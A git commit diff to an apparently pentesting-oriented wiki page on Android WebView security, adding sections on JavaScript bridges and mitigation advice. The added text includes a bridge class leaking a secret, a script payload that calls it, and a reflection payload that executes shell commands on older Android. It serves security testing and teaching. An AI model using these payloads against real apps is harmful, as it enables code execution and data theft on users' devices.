GitBook: [master] one page modified
This commit is contained in:
parent
ca2a4be2f5
commit
11ca02560d
@ -2,11 +2,6 @@
|
||||
|
||||
## Interesting Configurations
|
||||
|
||||
### Javascript Enabled
|
||||
|
||||
WebViews have Javascript **disabled by default**. The method [`setJavaScriptEnabled()`](https://developer.android.com/reference/android/webkit/WebSettings.html#setJavaScriptEnabled%28boolean%29) is can explicitly enabling or disabling it.
|
||||
Note that webviews can also support the **`intent`** **scheme** that allows to fire other applications. Read this [writeup to find how to go from XSS to RCE](https://medium.com/@dPhoeniixx/tiktok-for-android-1-click-rce-240266e78105).
|
||||
|
||||
### File Access
|
||||
|
||||
_WebView_ file access is enabled by default. Since API 3 \(Cupcake 1.5\) the method [_setAllowFileAccess\(\)_](https://developer.android.com/reference/android/webkit/WebSettings.html#setAllowFileAccess%28boolean%29) is available for explicitly enabling or disabling it.
|
||||
@ -48,6 +43,74 @@ The **default value is`false`** when targeting [`Build.VERSION_CODES.R`](https:/
|
||||
* Use [`getAllowFileAccess()`](https://developer.android.com/reference/android/webkit/WebSettings#getAllowFileAccess%28%29) to know if the configuration is enabled.
|
||||
* Use [`setAllowFileAccess(boolean)`](https://developer.android.com/reference/android/webkit/WebSettings#setAllowFileAccess%28boolean%29) to enable/disable it.
|
||||
|
||||
### Javascript Enabled
|
||||
|
||||
WebViews have Javascript **disabled by default**. The method [`setJavaScriptEnabled()`](https://developer.android.com/reference/android/webkit/WebSettings.html#setJavaScriptEnabled%28boolean%29) is can explicitly enabling or disabling it.
|
||||
Note that webviews can also support the **`intent`** **scheme** that allows to fire other applications. Read this [writeup to find how to go from XSS to RCE](https://medium.com/@dPhoeniixx/tiktok-for-android-1-click-rce-240266e78105).
|
||||
|
||||
### Javascript Bridge
|
||||
|
||||
Android offers a way for JavaScript executed in a WebView to call and use **native functions of an Android app** \(annotated with `@JavascriptInterface`\) by using the [`addJavascriptInterface`](https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface%28java.lang.Object,%20java.lang.String%29) method. This is known as a _WebView JavaScript bridge_ or _native bridge_.
|
||||
|
||||
Please note that **when you use `addJavascriptInterface`, you're explicitly granting access to the registered JavaScript Interface object to all pages loaded within that WebView**. This implies that, if the user navigates outside your app or domain, all other external pages will also have access to those JavaScript Interface objects which might present a potential security risk if any sensitive data is being exposed though those interfaces.
|
||||
|
||||
> Warning: Take extreme care with apps targeting Android versions below Android 4.2 \(API level 17\) as they are [vulnerable to a flaw](https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/) in the implementation of `addJavascriptInterface`: an attack that is abusing reflection, which leads to remote code execution when malicious JavaScript is injected into a WebView. This was due to all Java Object methods being accessible by default \(instead of only those annotated\).
|
||||
|
||||
#### Static Analysis
|
||||
|
||||
```javascript
|
||||
//Class with a method to access a secret
|
||||
public class JavascriptBridge {
|
||||
// Since Android 4.2 (JELLY_BEAN_MR1, API 17) methods
|
||||
// not annotated with @JavascriptInterface are not visible from JavaScript
|
||||
@JavascriptInterface
|
||||
public String getSecret() {
|
||||
return "SuperSecretPassword";
|
||||
};
|
||||
|
||||
}
|
||||
```
|
||||
|
||||
```javascript
|
||||
//Enabling Javascript Bridge exposing an object of the JavascriptBridge class
|
||||
webView.addJavascriptInterface(new JavascriptBridge(), "javascriptBridge");
|
||||
webView.reload();
|
||||
```
|
||||
|
||||
```markup
|
||||
<!-- Exploit to get the secret from JavaScript -->
|
||||
<script>alert(javascriptBridge.getSecret());</script>
|
||||
```
|
||||
|
||||
With access to the JavaScript code, via, for example, via stored **XSS,** **MITM** attack or a **malicious** **website** that is loaded inside the WebView, can directly call the exposed Java methods.
|
||||
|
||||
{% hint style="info" %}
|
||||
Note that in the case of trying to exploit this vulnerability via an **Open Redirect to an attackers web page that access the Native Android Objet**. If the access to the redirection is done via a mobile **browser** and **not using** the same **WebView**, the **browser won't be able to access the native Android object**.
|
||||
{% endhint %}
|
||||
|
||||
If `addJavascriptInterface` is necessary, take the following considerations:
|
||||
|
||||
* **Only JavaScript provided** with the APK should be allowed to use the bridges, e.g. by verifying the URL on each bridged Java method \(via `WebView.getUrl`\).
|
||||
* **No JavaScript should be loaded from remote endpoint**s, e.g. by keeping page navigation within the app's domains and opening all other domains on the default browser \(e.g. Chrome, Firefox\).
|
||||
* If necessary for legacy reasons \(e.g. having to support older devices\), **at least set the minimal API level to 17** in the manifest file of the app \(`<uses-sdk android:minSdkVersion="17" />`\).
|
||||
|
||||
### Javascript Bridge to RCE via Reflection
|
||||
|
||||
As noted in [**this research** ](https://labs.f-secure.com/archive/webview-addjavascriptinterface-remote-code-execution/)\(_check it for ideas in case you obtain RCE_\) ****once you found a JavascriptBridge it may be possible to obtain **RCE** via **Reflection** using a payload like the following one:
|
||||
|
||||
```markup
|
||||
<!-- javascriptBridge is the name of the Android exposed object -->
|
||||
<script>
|
||||
function execute(cmd){
|
||||
return javascriptBridge.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
|
||||
}
|
||||
execute(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']);
|
||||
</script>
|
||||
```
|
||||
|
||||
However modern applications may use the **`@JavascriptInterface` annotation** that indicates to the JavascriptBridge that **only** the method with this annotation should be **exposed**.
|
||||
In that scenario, you won't be able to abuse Reflection to execute arbitrary code.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Javascript Enabled & FileSystemAccess Disabled
|
||||
|
Loading…
Reference in New Issue
Block a user